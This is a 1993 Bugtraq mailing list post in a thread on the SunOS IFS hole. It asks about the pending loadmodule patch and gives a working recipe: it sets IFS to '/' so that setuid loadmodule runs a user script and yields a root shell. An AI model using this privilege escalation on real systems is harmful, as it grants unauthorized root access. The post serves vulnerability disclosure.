Bugtraq mailing list archives

Re: IFS hole?

From: kraitch () EECS Berkeley EDU (mark kraitchman)
Date: Wed, 15 Dec 1993 09:49:04 -0800


In Message-Id: <9312151103.AA10103 () ramon bgu ac il>
jsz () ramon bgu ac il (Yonathan) writes how to get root using
/usr/local/bin/sysinfo (which I don't have) and the IFS bug.

What I am wondering, is how long it will be before Sun officially
releases the sun4 patch for SunOS 4.1.x loadmodule (100448-02)?  I
thought the patch was going to be released yesterday?

Here is yet another `how-to' example about the importance of IFS in
setuid root programs.

%cat >~/bin/bin
#!/bin/sh
sh -i
^D
%chmod 755 ~/bin/bin
%setenv IFS /
%cd ~/bin
%/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
# whoami
root

Current thread:

Re: IFS hole? Yonathan (Dec 15)
- Re: IFS hole? abeckett () fmlrnd co uk (Dec 15)
- <Possible follow-ups>
- Re: IFS hole? mark kraitchman (Dec 15)
  - Re: IFS hole? Greg Woods (Dec 15)
  - IFS hole? Karyn Pichnarczyk (Dec 15)
- Re: IFS hole? henry strickland (Dec 15)
- Re: IFS hole? Peter shipley (Dec 15)
- Re: IFS hole? Rik Harris (Dec 15)
- Re: IFS hole? Christopher Davis (Dec 17)